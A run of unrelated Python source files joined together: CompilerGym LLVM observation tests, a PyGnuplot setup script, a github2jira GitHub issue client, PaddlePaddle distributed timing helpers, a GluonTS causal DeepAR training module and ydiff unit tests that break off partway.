space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value > 0 # Exact value is system dependent, see below. key = "TextSizeO3" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value > 0 # Exact value is system dependent, see below. key = "TextSizeOz" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value > 0 # Exact value is system dependent, see below. # NOTE(cummins): The exact values here depend on the system toolchain and # libraries, so only run this test on the GitHub CI runner environment where we # can hardcode the values. If this test starts to fail, it may be because the CI # runner environment has changed. @ci_only def test_text_size_observation_space_values(env: LlvmEnv): env.reset("cbench-v1/crc32") # Expected .text sizes for this benchmark: -O0, -O3, -Oz. crc32_code_sizes = {"darwin": [16384, 16384, 16384], "linux": [2850, 5652, 4980]} # For debugging in case of error. 
print(env.observation["TextSizeO0"]) print(env.observation["TextSizeO3"]) print(env.observation["TextSizeOz"]) assert env.observation.TextSizeO0() == crc32_code_sizes[sys.platform][0] assert env.observation.TextSizeO0() == crc32_code_sizes[sys.platform][0] assert env.observation.TextSizeO3() == crc32_code_sizes[sys.platform][1] assert env.observation.TextSizeOz() == crc32_code_sizes[sys.platform][2] @flaky # Runtimes can timeout def test_runtime_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Runtime" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) value: np.ndarray = env.observation[key] print(value.tolist()) # For debugging in case of error. assert isinstance(value, np.ndarray) assert env.runtime_observation_count == 1 assert value.shape == (1,) assert not space.deterministic assert space.platform_dependent assert space.space.contains(value) for buildtime in value: assert buildtime > 0 @flaky # Runtimes can timeout def test_runtime_observation_space_different_observation_count(env: LlvmEnv): """Test setting a custom observation count for LLVM runtimes.""" env.reset("cbench-v1/crc32") env.runtime_observation_count = 3 value: np.ndarray = env.observation["Runtime"] print(value.tolist()) # For debugging in case of error. assert value.shape == (3,) env.reset() value: np.ndarray = env.observation["Runtime"] print(value.tolist()) # For debugging in case of error. assert value.shape == (3,) env.runtime_observation_count = 5 value: np.ndarray = env.observation["Runtime"] print(value.tolist()) # For debugging in case of error. assert value.shape == (5,) @flaky # Runtimes can timeout def test_runtime_observation_space_invalid_observation_count(env: LlvmEnv): """Test setting an invalid custom observation count for LLVM runtimes.""" env.reset("cbench-v1/crc32") val = env.runtime_observation_count with pytest.raises( ValueError, match="runtimes_per_observation_count must be >= 1. Received: -5" ): env.runtime_observation_count = -5 assert env.runtime_observation_count == val # unchanged def test_runtime_observation_space_not_runnable(env: LlvmEnv): env.reset("chstone-v0/gsm") key = "Runtime" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert env.observation[key] is None @flaky # Build can timeout def test_buildtime_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Buildtime" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert not space.deterministic assert space.platform_dependent value: np.ndarray = env.observation[key] print(value) # For debugging in case of error. assert value.shape == (1,) assert space.space.contains(value) assert value[0] >= 0 def test_buildtime_observation_space_not_runnable(env: LlvmEnv): env.reset("chstone-v0/gsm") key = "Buildtime" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert not space.deterministic assert space.platform_dependent assert env.observation[key] is None def test_is_runnable_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "IsRunnable" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. 
assert isinstance(value, int) assert value == 1 def test_is_runnable_observation_space_not_runnable(env: LlvmEnv): env.reset("chstone-v0/gsm") key = "IsRunnable" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 0 def test_is_buildable_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "IsBuildable" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 1 def test_is_buildable_observation_space_not_buildable(env: LlvmEnv): env.reset("chstone-v0/gsm") key = "IsBuildable" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 0 def test_add_derived_space(env: LlvmEnv): env.reset() with pytest.deprecated_call( match="Use the derived_observation_spaces argument to CompilerEnv constructor." ): env.observation.add_derived_space( id="IrLen", base_id="Ir", space=Box(name="IrLen", low=0, high=float("inf"), shape=(1,), dtype=int), translate=lambda base: [15], ) value = env.observation["IrLen"] assert isinstance(value, list) assert value == [15] # Repeat the above test using the generated bound method. value = env.observation.IrLen() assert isinstance(value, list) assert value == [15] def test_derived_space_constructor(): """Test that derived observation space can be specified at construction time. """ with gym.make("llvm-v0") as env: env.observation_space = "AutophaseDict" a = env.reset() with gym.make("llvm-v0", observation_space="AutophaseDict") as env: b = env.reset() assert a == b if __name__ == "__main__": main() try: from setuptools import setup except ImportError: from distutils.core import setup with open('README.rst', 'r') as f: long_description = f.read() setup(name='PyGnuplot', py_modules=['PyGnuplot'], version='0.11.16', license='MIT', description='Python Gnuplot wrapper', long_description=long_description, author='<NAME>', author_email=' ', url='https://github.com/benschneider/PyGnuplot', download_url='https://github.com/benschneider/PyGnuplot/archive/0.11.16.tar.gz', keywords=['gnuplot', 'plot'], # install_requires=['numpy'], classifiers=["Topic :: Scientific/Engineering", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3.6", "Development Status :: 4 - Beta"], ) <filename>github2jira/githublib.py # This file is part of the github2jira project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Copyright 2021 Red Hat, Inc. 
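# Usage sketch (illustrative; assumes the GITHUB_TOKEN, GITHUB_OWNER,
# GITHUB_REPO and GITHUB_LABEL environment variables consumed by config()
# are set):
#
#   gh = Github(config())
#   for issue in gh.issues():
#       print(issue.id, issue.title, issue.url)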
# import time from datetime import datetime import requests from github2jira.config import Config SECONDS_PER_WEEK = 7 * 24 * 60 * 60 # max github pages to process GITHUB_MAX_PAGES = 20 # process upto x weeks back MAX_DELTA_WEEKS = 4 class GithubEnv: TOKEN = "GITHUB_TOKEN" OWNER = "GITHUB_OWNER" REPO = "GITHUB_REPO" LABEL = "GITHUB_LABEL" _ENV_VAR_NAMES = [GithubEnv.TOKEN, GithubEnv.OWNER, GithubEnv.REPO, GithubEnv.LABEL] def config(): c = Config(_ENV_VAR_NAMES) c.Load() return c class Issue: def __init__(self, issue): self._issue = issue @property def repo(self): return self._issue["html_url"].split("/")[4] @property def id(self): return self._issue["number"] @property def url(self): return self._issue["html_url"] @property def title(self): return self._issue["title"] @property def epoch(self): TIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ" timestamp = self._issue["created_at"] return int(datetime.strptime(timestamp, TIME_FORMAT).timestamp()) @property def raw_issue(self): return self._issue @property def labels(self): return [l["name"] for l in self._issue["labels"]] def __eq__(self, other): return self._issue == other._issue class Github: def __init__(self, cfg): owner = cfg.vars[GithubEnv.OWNER] repo = cfg.vars[GithubEnv.REPO] self.query_url = f"https://api.github.com/repos/{owner}/{repo}/issues" self.headers = {"Authorization": f"token {cfg.vars[GithubEnv.TOKEN]}"} self.expected_label = cfg.vars[GithubEnv.LABEL] def issue_by_id(self, issue_id): r = requests.get(f"{self.query_url}/{issue_id}", headers=self.headers) issue = r.json() if issue.get("url", None) is None: return None return Issue(issue) def issues(self): return self._filter(self._open_issues()) def _filter(self, issues): for issue in issues: if "pull" in issue.url: continue if ( self.expected_label == "" or self.expected_label in issue.labels ) and issue_in_time_window(issue, MAX_DELTA_WEEKS): yield issue def _open_issues(self): for page in range(1, GITHUB_MAX_PAGES): params = {"state": "open", "page": page, "per_page": "100"} r = requests.get(self.query_url, headers=self.headers, params=params) issues = r.json() if len(issues) == 0: return for issue in issues: yield Issue(issue) def issue_in_time_window(issue, max_delta_weeks): epoch = issue.epoch epoch_time_now = int(time.time()) return (epoch_time_now - epoch) < (max_delta_weeks * SECONDS_PER_WEEK) # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
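# The helpers below aggregate per-worker timing statistics across a
# paddle.distributed.fleet job: get_avg_cost_mins() all-reduces a local value
# and divides by the worker count, while get_max_cost_mins() and
# get_min_cost_mins() all-reduce with mode="max" / mode="min" and only log
# the result.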
from __future__ import print_function import os import sys import warnings import logging import numpy as np import time import paddle import paddle.fluid as fluid import paddle.distributed.fleet.base.role_maker as role_maker import paddle.distributed.fleet as fleet __dir__ = os.path.dirname(os.path.abspath(__file__)) sys.path.append(__dir__) import common logging.basicConfig( format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) def get_avg_cost_mins(value): t1 = time.time() local_cost = np.array([value]) global_cost = np.copy(local_cost) * 0 t2 = time.time() #fleet._role_maker._node_type_comm.Allreduce(local_cost, global_cost) global_cost = fleet.util.all_reduce(local_cost) t3 = time.time() avg_cost = float(global_cost[0]) / fleet.worker_num() avg_cost /= 60.0 t4 = time.time() tc = (t2 - t1 + t4 - t3) / 60.0 tb = (t3 - t2) / 60.0 logger.info("get_avg_cost_mins calc time %f barrier time %f" % (tc, tb)) return avg_cost def get_max_cost_mins(value): #from mpi4py import MPI local_cost = np.array([value]) global_cost = np.copy(local_cost) * 0 #fleet._role_maker._node_type_comm.Allreduce(local_cost, global_cost, op=MPI.MAX) global_cost = fleet.util.all_reduce(local_cost, mode="max") logger.info("max train time %f mins" % (float(global_cost[0]) / 60.0)) logger.info("max train time: %f", global_cost[0]) def get_min_cost_mins(value): #from mpi4py import MPI local_cost = np.array([value]) global_cost = np.copy(local_cost) * 0 #fleet._role_maker._node_type_comm.Allreduce(local_cost, global_cost, op=MPI.MIN) global_cost = fleet.util.all_reduce(local_cost, mode="min") logger.info("min train time %f mins" % (float(global_cost[0]) / 60.0)) # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. 
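# Usage sketch (illustrative only; the model construction and the dataloaders
# are assumptions, not part of this file):
#
#   module = CausalDeepARLightningModule(model=causal_deepar_model)
#   trainer = pl.Trainer(max_epochs=10)
#   trainer.fit(module, train_dataloaders=train_loader, val_dataloaders=val_loader)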
from typing import Dict, Tuple import pytorch_lightning as pl import torch from gluonts.torch.modules.loss import DistributionLoss, NegativeLogLikelihood from gluonts.torch.util import weighted_average from .module import CausalDeepARModel class CausalDeepARLightningModule(pl.LightningModule): def __init__( self, model: CausalDeepARModel, loss: DistributionLoss = NegativeLogLikelihood(), lr: float = 1e-3, weight_decay: float = 1e-8, control_loss_weight: float = 1.0, ) -> None: super().__init__() self.save_hyperparameters() self.model = model self.loss = loss self.lr = lr self.weight_decay = weight_decay self.control_loss_weight = control_loss_weight def _compute_loss(self, batch: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]: feat_static_cat = batch["feat_static_cat"] feat_static_real = batch["feat_static_real"] past_time_feat = batch["past_time_feat"] past_target = batch["past_target"] future_time_feat = batch["future_time_feat"] future_target = batch["future_target"] past_observed_values = batch["past_observed_values"] future_observed_values = batch["future_observed_values"] past_control = batch["past_control"] future_control = batch["future_control"] control_distr, distr = self.model.distribution( feat_static_cat=feat_static_cat, feat_static_real=feat_static_real, past_time_feat=past_time_feat, past_target=past_target, past_observed_values=past_observed_values, future_time_feat=future_time_feat, future_target=future_target, future_observed_values=future_observed_values, past_control=past_control, future_control=future_control, ) context_target = past_target[:, -self.model.context_length + 1 :] target = torch.cat( (context_target, future_target), dim=1, ) context_control = past_control[:, -self.model.context_length + 1:] control = torch.cat( (context_control, future_control), dim=1, ) context_observed = past_observed_values[ :, -self.model.context_length + 1 : ] observed_values = torch.cat( (context_observed, future_observed_values), dim=1 ) if len(self.model.target_shape) == 0: loss_weights = observed_values else: loss_weights = observed_values.min(dim=-1, keepdim=False) control_loss = weighted_average(self.loss(control_distr, control), weights=loss_weights) target_loss = weighted_average(self.loss(distr, target), weights=loss_weights) return control_loss, target_loss def training_step(self, batch, batch_idx: int): """Execute training step""" train_control_loss, train_target_loss = self._compute_loss(batch) train_loss = self.control_loss_weight * train_control_loss + train_target_loss self.log( "train_control_loss", train_control_loss, on_epoch=True, on_step=False, prog_bar=True, ) self.log( "train_target_loss", train_target_loss, on_epoch=True, on_step=False, prog_bar=True, ) self.log( "train_loss", train_loss, on_epoch=True, on_step=False, prog_bar=True, ) return train_loss def validation_step(self, batch, batch_idx: int): """Execute validation step""" val_control_loss, val_target_loss = self._compute_loss(batch) val_loss = self.control_loss_weight * val_control_loss + val_target_loss self.log( "val_control_loss", val_control_loss, on_epoch=True, on_step=False, prog_bar=True, ) self.log( "val_target_loss", val_target_loss, on_epoch=True, on_step=False, prog_bar=True, ) self.log( "val_loss", val_loss, on_epoch=True, on_step=False, prog_bar=True, ) return val_loss def configure_optimizers(self): """Returns the optimizer to use""" return torch.optim.Adam( self.model.parameters(), lr=self.lr, weight_decay=self.weight_decay, ) #!/usr/bin/env python # -*- coding: utf-8 -*- 
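# The test classes below exercise ydiff's building blocks directly
# (PatchStream, Hunk, DiffMarker, UnifiedDiff and DiffParser); expected
# outputs are compared against raw ANSI-colored strings rather than against
# the command-line front end.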
"""Unit test for ydiff""" import sys import unittest import tempfile import subprocess import os sys.path.insert(0, '') import ydiff # nopep8 class Sequential(object): """A non-seekable iterator, mock of file object""" def __init__(self, items): self._items = items self._index = 0 def __iter__(self): while True: try: item = self._items[self._index] except IndexError: raise StopIteration yield item self._index += 1 def readline(self): try: item = self._items[self._index] except IndexError: return '' self._index += 1 return item class PatchStreamTest(unittest.TestCase): def test_is_empty(self): stream = ydiff.PatchStream(Sequential([])) self.assertTrue(stream.is_empty()) stream = ydiff.PatchStream(Sequential(['hello', 'world'])) self.assertFalse(stream.is_empty()) class DecodeTest(unittest.TestCase): def test_normal(self): utext = 'hello'.encode('utf-8') self.assertEqual('hello', ydiff.decode(utext)) def test_latin_1(self): text = '\x80\x02q\x01(U' if sys.version_info[0] == 2: decoded_text = text.decode('latin-1') else: decoded_text = text self.assertEqual(decoded_text, ydiff.decode(text)) class HunkTest(unittest.TestCase): def test_get_old_text(self): hunk = ydiff.Hunk([], '@@ -1,2 +1,2 @@', (1, 2), (1, 2)) hunk.append(('-', 'foo\n')) hunk.append(('+', 'bar\n')) hunk.append((' ', 'common\n')) self.assertEqual(hunk._get_old_text(), ['foo\n', 'common\n']) def test_get_new_text(self): hunk = ydiff.Hunk([], '@@ -1,2 +1,2 @@', (1, 2), (1, 2)) hunk.append(('-', 'foo\n')) hunk.append(('+', 'bar\n')) hunk.append((' ', 'common\n')) self.assertEqual(hunk._get_new_text(), ['bar\n', 'common\n']) class DiffMarkupTest(unittest.TestCase): def _init_diff(self): """Return a minimal diff contains all required samples header --- old +++ new hunk header @@ -1,5 +1,5 @@ -hhello +helloo +spammm world -garb -Again - tabbed +again + spaced """ hunk = ydiff.Hunk(['hunk header\n'], '@@ -1,5 +1,5 @@\n', (1, 5), (1, 5)) hunk.append(('-', 'hhello\n')) hunk.append(('+', 'helloo\n')) hunk.append(('+', 'spammm\n')) hunk.append((' ', 'world\n')) hunk.append(('-', 'garb\n')) hunk.append(('-', 'Again\n')) hunk.append(('-', ' tabbed\n')) hunk.append(('+', 'again\n')) hunk.append(('+', ' spaced\n')) diff = ydiff.UnifiedDiff( ['header\n'], '--- old\n', '+++ new\n', [hunk]) return diff def test_markup_traditional_hunk_header(self): hunk = ydiff.Hunk(['hunk header\n'], '@@ -0 +0 @@\n', (0, 0), (0, 0)) diff = ydiff.UnifiedDiff([], '--- old\n', '+++ new\n', [hunk]) marker = ydiff.DiffMarker() out = list(marker.markup(diff)) self.assertEqual(len(out), 4) self.assertEqual(out[0], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[2], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;34m@@ -0 +0 @@\n\x1b[0m') def test_markup_traditional_old_changed(self): hunk = ydiff.Hunk([], '@@ -1 +0,0 @@\n', (1, 0), (0, 0)) hunk.append(('-', 'spam\n')) diff = ydiff.UnifiedDiff([], '--- old\n', '+++ new\n', [hunk]) marker = ydiff.DiffMarker() out = list(marker.markup(diff)) self.assertEqual(len(out), 4) self.assertEqual(out[0], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[2], '\x1b[1;34m@@ -1 +0,0 @@\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;31m-spam\n\x1b[0m') def test_markup_traditional_new_changed(self): hunk = ydiff.Hunk([], '@@ -0,0 +1 @@\n', (0, 0), (1, 0)) hunk.append(('+', 'spam\n')) diff = ydiff.UnifiedDiff([], '--- old\n', '+++ new\n', [hunk]) marker = ydiff.DiffMarker() out = list(marker.markup(diff)) 
self.assertEqual(len(out), 4) self.assertEqual(out[0], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[2], '\x1b[1;34m@@ -0,0 +1 @@\n\x1b[0m') self.assertEqual(out[3], '\x1b[32m+spam\n\x1b[0m') def test_markup_traditional_both_changed(self): hunk = ydiff.Hunk([], '@@ -1,2 +1,2 @@\n', (1, 2), (1, 2)) hunk.append(('-', 'hella\n')) hunk.append(('+', 'hello\n')) hunk.append((' ', 'common\n')) diff = ydiff.UnifiedDiff([], '--- old\n', '+++ new\n', [hunk]) marker = ydiff.DiffMarker() out = list(marker.markup(diff)) self.assertEqual(len(out), 6) self.assertEqual(out[0], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[2], '\x1b[1;34m@@ -1,2 +1,2 @@\n\x1b[0m') self.assertEqual( out[3], '\x1b[1;31m-\x1b[0m\x1b[31mhell' '\x1b[4m\x1b[31ma\x1b[0m\x1b[31m\n\x1b[0m') self.assertEqual( out[4], '\x1b[32m+\x1b[0m\x1b[32mhell' '\x1b[4m\x1b[32mo\x1b[0m\x1b[32m\n\x1b[0m') self.assertEqual(out[5], '\x1b[0m common\n\x1b[0m') def test_markup_side_by_side_padded(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=7) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) sys.stdout.write('\n') for markup in out: sys.stdout.write(markup) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,5 +1,5 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhello\x1b[0m ' '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhello\x1b[7m\x1b[32mo\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m ' '\x1b[0m ' '\x1b[0m\x1b[33m2\x1b[0m ' '\x1b[32mspammm\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') self.assertEqual( out[10], '\x1b[33m5\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31m \x1b[0m\x1b[1;35m>\x1b[0m ' '\x1b[0m\x1b[33m5\x1b[0m ' '\x1b[32m\x1b[7m\x1b[32m spaced\x1b[0m\n') # This test is not valid anymore def __test_markup_side_by_side_neg_width(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=-1) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,4 +1,4 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhello\x1b[0m ' + (' ' * 74) + '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhello\x1b[7m\x1b[32mo\x1b[0m\x1b[32m\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m ' '\x1b[0m ' + (' ' * 80) + '\x1b[0m\x1b[33m2\x1b[0m ' '\x1b[32mspammm\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' + (' ' * 75) + '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' 
'\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' + (' ' * 75) + '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') def test_markup_side_by_side_off_by_one(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=6) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) sys.stdout.write('\n') for markup in out: sys.stdout.write(markup) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,5 +1,5 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhello\x1b[0m ' '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhello\x1b[7m\x1b[32mo\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m \x1b[0m ' '\x1b[0m\x1b[33m2\x1b[0m ' '\x1b[32mspammm\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') self.assertEqual( out[10], '\x1b[33m5\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31m \x1b[0m\x1b[1;35m>\x1b[0m ' '\x1b[0m\x1b[33m5\x1b[0m ' '\x1b[32m\x1b[7m\x1b[32m spac\x1b[0m\x1b[1;35m>\x1b[0m\n') def test_markup_side_by_side_wrapped(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=5) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) sys.stdout.write('\n') for markup in out: sys.stdout.write(markup) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,5 +1,5 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhel\x1b[0m\x1b[1;35m>\x1b[0m ' # nopep8 '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhell\x1b[0m\x1b[1;35m>\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m \x1b[0m ' '\x1b[0m\x1b[33m2\x1b[0m ' '' '\x1b[32mspam\x1b[0m\x1b[1;35m>\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') self.assertEqual( out[10], '\x1b[33m5\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31m \x1b[0m\x1b[1;35m>\x1b[0m ' '\x1b[0m\x1b[33m5\x1b[0m ' '\x1b[32m\x1b[7m\x1b[32m spa\x1b[0m\x1b[1;35m>\x1b[0m\n') def test_markup_side_by_side_tabbed(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=8, tab_width=2) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) sys.stdout.write('\n') for markup in out: sys.stdout.write(markup) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,5 +1,5 @@\n\x1b[0m') 
self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhello\x1b[0m ' '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhello\x1b[7m\x1b[32mo\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m ' '\x1b[0m ' '\x1b[0m\x1b[33m2\x1b[0m ' '\x1b[32mspammm\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') self.assertEqual( out[10], '\x1b[33m5\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31m tabbed\x1b[0m ' '\x1b[0m\x1b[33m5\x1b[0m ' '\x1b[32m\x1b[7m\x1b[32m spaced\x1b[0m\n') class UnifiedDiffTest(unittest.TestCase): diff = ydiff.UnifiedDiff(None, None, None, None) def test_is_hunk_meta_normal(self): self.assertTrue(self.diff.is_hunk_meta('@@ -1 +1 @@')) self.assertTrue(self.diff.is_hunk_meta('@@ -3,7 +3,6 @@')) self.assertTrue(self.diff.is_hunk_meta('@@ -3,7 +3,6 @@ class Foo')) self.assertTrue(self.diff.is_hunk_meta('@@ -3,7 +3,6 @@ class Foo\n')) self.assertTrue( self.diff.is_hunk_meta('@@ -3,7 +3,6 @@ class Foo\r\n')) def test_is_hunk_meta_svn_prop(self): 